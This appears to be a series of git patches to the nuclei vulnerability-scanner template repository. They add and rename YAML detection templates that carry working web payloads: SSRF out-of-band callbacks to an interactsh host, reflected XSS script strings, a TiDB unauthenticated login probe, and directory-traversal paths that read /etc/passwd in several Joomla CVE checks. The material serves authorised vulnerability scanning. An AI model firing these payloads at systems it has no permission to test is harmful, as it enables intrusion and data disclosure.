bd6b22ee841a4e2e7121ac0e46b46584613dfb55 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 09:46:59 +0000 Subject: [PATCH 2549/4083] Auto README Update [Tue Sep 28 09:46:59 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 380e7c1928..0b53bebb69 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -**166 directories, 2139 files**. +**166 directories, 2144 files**. From 52a5e335563be3c7b73f20d213b491f798d5166a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:17:21 +0530 Subject: [PATCH 2550/4083] Create generic-oob-param-based-interaction.yaml --- .../generic-oob-param-based-interaction.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 vulnerabilities/generic/generic-oob-param-based-interaction.yaml diff --git a/vulnerabilities/generic/generic-oob-param-based-interaction.yaml b/vulnerabilities/generic/generic-oob-param-based-interaction.yaml new file mode 100644 index 0000000000..429facfaee --- /dev/null +++ b/vulnerabilities/generic/generic-oob-param-based-interaction.yaml @@ -0,0 +1,21 @@ +id: generic-oob-param-based-interaction + +info: + name: Parameter Based Generic OOB Interaction + author: pdteam + severity: info + description: The remote server fetched a spoofed URL from the request parameters. + reference: https://github.com/PortSwigger/collaborator-everywhere + tags: oob,ssrf,generic + +requests: + - method: GET + path: + - "{{BaseURL}}/?u=http://{{interactsh-url}}/&href=http://{{interactsh-url}}/&action=http://{{interactsh-url}}/&host={{interactsh-url}}&http_host={{interactsh-url}}&email=root@{{interactsh-url}}&url=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&preview=http://{{interactsh-url}}/&target=http://{{interactsh-url}}/&proxy=http://{{interactsh-url}}/&from=http://{{interactsh-url}}/&src=http://{{interactsh-url}}/&ref=http://{{interactsh-url}}/&referrer=http://{{interactsh-url}}/" + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" From 8042d1233e8fa817c13fe165ae00a695e707bea2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:18:26 +0530 Subject: [PATCH 2551/4083] Create request-interaction-oob.yaml --- .../generic/request-interaction-oob.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 vulnerabilities/generic/request-interaction-oob.yaml diff --git a/vulnerabilities/generic/request-interaction-oob.yaml b/vulnerabilities/generic/request-interaction-oob.yaml new file mode 100644 index 0000000000..15534c994d --- /dev/null +++ b/vulnerabilities/generic/request-interaction-oob.yaml @@ -0,0 +1,49 @@ +id: request-interaction-oob + +info: + name: OOB Request Based Interaction + author: pdteam + severity: info + description: The remote server fetched a spoofed DNS Name from the request. + reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface + tags: oob,ssrf,generic + +requests: + - raw: + - |+ + GET / HTTP/1.1 + Host: {{interactsh-url}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET / HTTP/1.1 + Host: @{{interactsh-url}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET http://{{interactsh-url}}/ HTTP/1.1 + Host: {{Hostname}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET @{{interactsh-url}}/ HTTP/1.1 + Host: {{Hostname}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET {{interactsh-url}}:80/ HTTP/1.1 + Host: {{Hostname}} + Cache-Control: no-transform + Accept: */* + + unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" From 25a971efd4aa8addc2f3b083b1943c58a299bb1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:21:27 +0530 Subject: [PATCH 2552/4083] Update and rename generic-oob-header-based-interaction.yaml to oob-header-based-interaction.yaml --- ...based-interaction.yaml => oob-header-based-interaction.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/generic/{generic-oob-header-based-interaction.yaml => oob-header-based-interaction.yaml} (97%) diff --git a/vulnerabilities/generic/generic-oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml similarity index 97% rename from vulnerabilities/generic/generic-oob-header-based-interaction.yaml rename to vulnerabilities/generic/oob-header-based-interaction.yaml index 5a6ad517a0..399af47472 100644 --- a/vulnerabilities/generic/generic-oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -1,4 +1,4 @@ -id: generic-oob-header-based-interaction +id: oob-header-based-interaction info: name: Header Based Generic OOB Interaction From 97ef8f00e294e689b881d206ea4a5234774f7872 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:21:41 +0530 Subject: [PATCH 2553/4083] Update and rename generic-oob-param-based-interaction.yaml to oob-param-based-interaction.yaml --- ...-based-interaction.yaml => oob-param-based-interaction.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/generic/{generic-oob-param-based-interaction.yaml => oob-param-based-interaction.yaml} (95%) diff --git a/vulnerabilities/generic/generic-oob-param-based-interaction.yaml b/vulnerabilities/generic/oob-param-based-interaction.yaml similarity index 95% rename from vulnerabilities/generic/generic-oob-param-based-interaction.yaml rename to vulnerabilities/generic/oob-param-based-interaction.yaml index 429facfaee..3c3dbce5db 100644 --- a/vulnerabilities/generic/generic-oob-param-based-interaction.yaml +++ b/vulnerabilities/generic/oob-param-based-interaction.yaml @@ -1,4 +1,4 @@ -id: generic-oob-param-based-interaction +id: oob-param-based-interaction info: name: Parameter Based Generic OOB Interaction From cee46ca968d42d9993001777c5aea686c88da651 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:22:30 +0530 Subject: [PATCH 2554/4083] Update and rename request-interaction-oob.yaml to request-based-interaction.yaml --- ...uest-interaction-oob.yaml => request-based-interaction.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/generic/{request-interaction-oob.yaml => request-based-interaction.yaml} (97%) diff --git a/vulnerabilities/generic/request-interaction-oob.yaml b/vulnerabilities/generic/request-based-interaction.yaml similarity index 97% rename from vulnerabilities/generic/request-interaction-oob.yaml rename to vulnerabilities/generic/request-based-interaction.yaml index 15534c994d..e968c99cd6 100644 --- a/vulnerabilities/generic/request-interaction-oob.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -1,4 +1,4 @@ -id: request-interaction-oob +id: request-based-interaction info: name: OOB Request Based Interaction From 6a38e21a98ebd8ef418cb251601e30b4fa2936b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 10:05:39 +0000 Subject: [PATCH 2555/4083] Auto Generated CVE annotations [Tue Sep 28 10:05:39 UTC 2021] :robot: --- cves/2021/CVE-2021-22005.yaml | 5 +++++ cves/2021/CVE-2021-33544.yaml | 7 ++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 6a7b22b6f6..82caf272c4 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -10,6 +10,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq tags: cve,cve2021,vmware,vcenter + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 0d381d2581..6337242a45 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -4,10 +4,15 @@ info: name: Geutebruck RCE description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 - severity: critical + severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ tags: cve,cve2021,geutebruck,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2021-33544 + cwe-id: CWE-77 requests: - raw: From 779302f717fdef66097d0e56e675123f660f43d3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:35:46 +0530 Subject: [PATCH 2556/4083] Update CVE-2021-40868.yaml --- cves/2021/CVE-2021-40868.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml index efec85092f..ac23724b91 100644 --- a/cves/2021/CVE-2021-40868.yaml +++ b/cves/2021/CVE-2021-40868.yaml @@ -3,17 +3,17 @@ id: CVE-2021-40868 info: name: Cloudron 6.2 Cross Site Scripting author: daffainfo - description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. severity: medium + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 tags: cve,cve2021,xss,cloudron requests: - method: GET path: - - '{{BaseURL}}/login.html?returnTo=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E' + - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,5 +28,5 @@ requests: - type: word words: - - '">' + - '' part: body From 5c80f9dc4c5824cb0a5c0931597e2fd269854c07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:38:03 +0530 Subject: [PATCH 2557/4083] Update and rename wp-church-admin-lfi.yaml to vulnerabilities/wordpress/church-admin-lfi.yaml --- .../wordpress/church-admin-lfi.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename wp-church-admin-lfi.yaml => vulnerabilities/wordpress/church-admin-lfi.yaml (59%) diff --git a/wp-church-admin-lfi.yaml b/vulnerabilities/wordpress/church-admin-lfi.yaml similarity index 59% rename from wp-church-admin-lfi.yaml rename to vulnerabilities/wordpress/church-admin-lfi.yaml index b97b529ca9..9885353c52 100644 --- a/wp-church-admin-lfi.yaml +++ b/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -1,11 +1,14 @@ -id: wp-plugin-church-admin-lfi +id: church-admin-lfi info: name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high + description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack. + reference: + - https://wpscan.com/vulnerability/8997 + - https://id.wordpress.org/plugins/church-admin/ tags: wordpress,wp-plugin,lfi - reference: https://wpscan.com/vulnerability/8997 requests: - method: GET From af85d5f6cc4b4d4ca2a2dce76a2b1c3b97426981 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:43:21 +0530 Subject: [PATCH 2558/4083] Update CVE-2021-39320.yaml --- cves/2021/CVE-2021-39320.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml index 3e5a9c2cc1..9c8808cd68 100644 --- a/cves/2021/CVE-2021-39320.yaml +++ b/cves/2021/CVE-2021-39320.yaml @@ -4,25 +4,29 @@ info: name: underConstruction < 1.19 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium + description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - tags: wordpress,xss,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-39320 cwe-id: CWE-79 - description: "The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." + tags: wordpress,xss,cve,cve2021,wp-plugin + requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php/">/?page=under-construction' + - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction' + matchers-condition: and matchers: - type: word part: body words: - - '' + - '' + - type: word part: header words: From 783be71a1cedfbe2ecb8cc88bf0efd10639857e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 10:14:40 +0000 Subject: [PATCH 2559/4083] Auto Generated CVE annotations [Tue Sep 28 10:14:40 UTC 2021] :robot: --- cves/2021/CVE-2021-22005.yaml | 5 +++++ cves/2021/CVE-2021-33544.yaml | 7 ++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 6a7b22b6f6..82caf272c4 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -10,6 +10,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq tags: cve,cve2021,vmware,vcenter + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 0d381d2581..6337242a45 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -4,10 +4,15 @@ info: name: Geutebruck RCE description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 - severity: critical + severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ tags: cve,cve2021,geutebruck,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2021-33544 + cwe-id: CWE-77 requests: - raw: From 1a2ebb42fd91e47f7643b29e37a3d2adf6e2dd9f Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 28 Sep 2021 18:17:35 +0800 Subject: [PATCH 2560/4083] Add TiDB unauthenticated check plugin --- network/tidb-unauth.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 network/tidb-unauth.yaml diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml new file mode 100644 index 0000000000..8bdf9d9601 --- /dev/null +++ b/network/tidb-unauth.yaml @@ -0,0 +1,26 @@ +id: tidb-unauth + +info: + name: Unauth TiDB Disclosure + author: lu4nx + severity: high + tags: network,tidb + +network: + - inputs: + - read: 1024 # skip handshake packet + - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:4000" + + read-size: 1024 + + matchers: + - type: binary + binary: + # resp format: + # 07: length, 02: sequence number, 00: success + - "0700000200000002000000" From a5c9570d1ff4ead8de8c4317cd5e2cebd243b482 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 16:12:51 +0530 Subject: [PATCH 2561/4083] updates --- cves/2010/{CVE-2010-2045.yml => CVE-2010-2045.yaml} | 4 ++-- cves/2010/{CVE-2010-2050.yml => CVE-2010-2050.yaml} | 0 cves/2010/{CVE-2010-2128.yml => CVE-2010-2128.yaml} | 0 cves/2010/{CVE-2010-2507.yml => CVE-2010-2507.yaml} | 0 cves/2010/{CVE-2010-2680.yml => CVE-2010-2680.yaml} | 4 ++-- cves/2010/{CVE-2010-2857.yml => CVE-2010-2857.yaml} | 0 cves/2010/{CVE-2010-2918.yml => CVE-2010-2918.yaml} | 4 ++-- cves/2010/{CVE-2010-3203.yml => CVE-2010-3203.yaml} | 0 cves/2010/{CVE-2010-4282.yml => CVE-2010-4282.yaml} | 4 ++-- cves/2010/{CVE-2010-4719.yml => CVE-2010-4719.yaml} | 4 ++-- cves/2010/{CVE-2010-4769.yml => CVE-2010-4769.yaml} | 4 ++-- cves/2010/{CVE-2010-4977.yml => CVE-2010-4977.yaml} | 2 +- cves/2010/{CVE-2010-5028.yml => CVE-2010-5028.yaml} | 2 +- cves/2010/{CVE-2010-5286.yml => CVE-2010-5286.yaml} | 2 +- cves/2011/{CVE-2011-2744.yml => CVE-2011-2744.yaml} | 4 ++-- cves/2012/{CVE-2012-0981.yml => CVE-2012-0981.yaml} | 2 +- cves/2012/{CVE-2012-0996.yml => CVE-2012-0996.yaml} | 2 +- cves/2012/{CVE-2012-1226.yml => CVE-2012-1226.yaml} | 2 +- cves/2014/{CVE-2014-10037.yml => CVE-2014-10037.yaml} | 2 +- cves/2014/{CVE-2014-5111.yml => CVE-2014-5111.yaml} | 0 cves/2014/{CVE-2014-5258.yml => CVE-2014-5258.yaml} | 2 +- cves/2015/CVE-2015-1000012.yaml | 2 +- cves/2015/{CVE-2015-4414.yml => CVE-2015-4414.yaml} | 2 +- cves/2015/{CVE-2015-4632.yml => CVE-2015-4632.yaml} | 0 24 files changed, 24 insertions(+), 24 deletions(-) rename cves/2010/{CVE-2010-2045.yml => CVE-2010-2045.yaml} (89%) rename cves/2010/{CVE-2010-2050.yml => CVE-2010-2050.yaml} (100%) rename cves/2010/{CVE-2010-2128.yml => CVE-2010-2128.yaml} (100%) rename cves/2010/{CVE-2010-2507.yml => CVE-2010-2507.yaml} (100%) rename cves/2010/{CVE-2010-2680.yml => CVE-2010-2680.yaml} (90%) rename cves/2010/{CVE-2010-2857.yml => CVE-2010-2857.yaml} (100%) rename cves/2010/{CVE-2010-2918.yml => CVE-2010-2918.yaml} (85%) rename cves/2010/{CVE-2010-3203.yml => CVE-2010-3203.yaml} (100%) rename cves/2010/{CVE-2010-4282.yml => CVE-2010-4282.yaml} (93%) rename cves/2010/{CVE-2010-4719.yml => CVE-2010-4719.yaml} (82%) rename cves/2010/{CVE-2010-4769.yml => CVE-2010-4769.yaml} (88%) rename cves/2010/{CVE-2010-4977.yml => CVE-2010-4977.yaml} (96%) rename cves/2010/{CVE-2010-5028.yml => CVE-2010-5028.yaml} (96%) rename cves/2010/{CVE-2010-5286.yml => CVE-2010-5286.yaml} (96%) rename cves/2011/{CVE-2011-2744.yml => CVE-2011-2744.yaml} (92%) rename cves/2012/{CVE-2012-0981.yml => CVE-2012-0981.yaml} (92%) rename cves/2012/{CVE-2012-0996.yml => CVE-2012-0996.yaml} (95%) rename cves/2012/{CVE-2012-1226.yml => CVE-2012-1226.yaml} (96%) rename cves/2014/{CVE-2014-10037.yml => CVE-2014-10037.yaml} (95%) rename cves/2014/{CVE-2014-5111.yml => CVE-2014-5111.yaml} (100%) rename cves/2014/{CVE-2014-5258.yml => CVE-2014-5258.yaml} (95%) rename cves/2015/{CVE-2015-4414.yml => CVE-2015-4414.yaml} (96%) rename cves/2015/{CVE-2015-4632.yml => CVE-2015-4632.yaml} (100%) diff --git a/cves/2010/CVE-2010-2045.yml b/cves/2010/CVE-2010-2045.yaml similarity index 89% rename from cves/2010/CVE-2010-2045.yml rename to cves/2010/CVE-2010-2045.yaml index 886f48ac65..b40cfaab94 100644 --- a/cves/2010/CVE-2010-2045.yml +++ b/cves/2010/CVE-2010-2045.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12595 - https://www.cvedetails.com/cve/CVE-2010-2045 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=[LFI]%00" + - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-2050.yml b/cves/2010/CVE-2010-2050.yaml similarity index 100% rename from cves/2010/CVE-2010-2050.yml rename to cves/2010/CVE-2010-2050.yaml diff --git a/cves/2010/CVE-2010-2128.yml b/cves/2010/CVE-2010-2128.yaml similarity index 100% rename from cves/2010/CVE-2010-2128.yml rename to cves/2010/CVE-2010-2128.yaml diff --git a/cves/2010/CVE-2010-2507.yml b/cves/2010/CVE-2010-2507.yaml similarity index 100% rename from cves/2010/CVE-2010-2507.yml rename to cves/2010/CVE-2010-2507.yaml diff --git a/cves/2010/CVE-2010-2680.yml b/cves/2010/CVE-2010-2680.yaml similarity index 90% rename from cves/2010/CVE-2010-2680.yml rename to cves/2010/CVE-2010-2680.yaml index 6d1b76393a..fa1dc916da 100644 --- a/cves/2010/CVE-2010-2680.yml +++ b/cves/2010/CVE-2010-2680.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/14064 - https://www.cvedetails.com/cve/CVE-2010-2680 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=[LFI]" + - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-2857.yml b/cves/2010/CVE-2010-2857.yaml similarity index 100% rename from cves/2010/CVE-2010-2857.yml rename to cves/2010/CVE-2010-2857.yaml diff --git a/cves/2010/CVE-2010-2918.yml b/cves/2010/CVE-2010-2918.yaml similarity index 85% rename from cves/2010/CVE-2010-2918.yml rename to cves/2010/CVE-2010-2918.yaml index 6585591609..b8ddd64eb5 100644 --- a/cves/2010/CVE-2010-2918.yml +++ b/cves/2010/CVE-2010-2918.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/31708 - https://www.cvedetails.com/cve/CVE-2010-2918 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]" + - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-3203.yml b/cves/2010/CVE-2010-3203.yaml similarity index 100% rename from cves/2010/CVE-2010-3203.yml rename to cves/2010/CVE-2010-3203.yaml diff --git a/cves/2010/CVE-2010-4282.yml b/cves/2010/CVE-2010-4282.yaml similarity index 93% rename from cves/2010/CVE-2010-4282.yml rename to cves/2010/CVE-2010-4282.yaml index 6b4f52c658..074fd7401b 100644 --- a/cves/2010/CVE-2010-4282.yml +++ b/cves/2010/CVE-2010-4282.yaml @@ -5,10 +5,10 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. - reference: | + reference: - https://www.exploit-db.com/exploits/15643 - https://www.cvedetails.com/cve/CVE-2010-4282 - tags: cve,cve2010,lfi + tags: cve,cve2010,lfi,joomla requests: - method: GET diff --git a/cves/2010/CVE-2010-4719.yml b/cves/2010/CVE-2010-4719.yaml similarity index 82% rename from cves/2010/CVE-2010-4719.yml rename to cves/2010/CVE-2010-4719.yaml index 1d50e72775..145fed21d3 100644 --- a/cves/2010/CVE-2010-4719.yml +++ b/cves/2010/CVE-2010-4719.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/15749 - https://www.cvedetails.com/cve/CVE-2010-4719 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_jradio&controller=[LFI]%00" + - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-4769.yml b/cves/2010/CVE-2010-4769.yaml similarity index 88% rename from cves/2010/CVE-2010-4769.yml rename to cves/2010/CVE-2010-4769.yaml index 84aebb4c15..3de9150cf4 100644 --- a/cves/2010/CVE-2010-4769.yml +++ b/cves/2010/CVE-2010-4769.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/15585 - https://www.cvedetails.com/cve/CVE-2010-4769 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00" + - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-4977.yml b/cves/2010/CVE-2010-4977.yaml similarity index 96% rename from cves/2010/CVE-2010-4977.yml rename to cves/2010/CVE-2010-4977.yaml index 455e53f70c..eb135d7ccc 100644 --- a/cves/2010/CVE-2010-4977.yml +++ b/cves/2010/CVE-2010-4977.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/34250 - https://www.cvedetails.com/cve/CVE-2010-4977 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-5028.yml b/cves/2010/CVE-2010-5028.yaml similarity index 96% rename from cves/2010/CVE-2010-5028.yml rename to cves/2010/CVE-2010-5028.yaml index c5a262e530..01a95abcad 100644 --- a/cves/2010/CVE-2010-5028.yml +++ b/cves/2010/CVE-2010-5028.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12601 - https://www.cvedetails.com/cve/CVE-2010-5028 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-5286.yml b/cves/2010/CVE-2010-5286.yaml similarity index 96% rename from cves/2010/CVE-2010-5286.yml rename to cves/2010/CVE-2010-5286.yaml index 9657c736eb..e27c4edeb5 100644 --- a/cves/2010/CVE-2010-5286.yml +++ b/cves/2010/CVE-2010-5286.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/34837 - https://www.cvedetails.com/cve/CVE-2010-5286 tags: cve,cve2010,joomla,lfi diff --git a/cves/2011/CVE-2011-2744.yml b/cves/2011/CVE-2011-2744.yaml similarity index 92% rename from cves/2011/CVE-2011-2744.yml rename to cves/2011/CVE-2011-2744.yaml index a31bf3374a..041e731693 100644 --- a/cves/2011/CVE-2011-2744.yml +++ b/cves/2011/CVE-2011-2744.yaml @@ -5,10 +5,10 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. - reference: | + reference: - https://www.exploit-db.com/exploits/35945 - https://www.cvedetails.com/cve/CVE-2011-2744 - tags: cve,cve2011,lfi + tags: 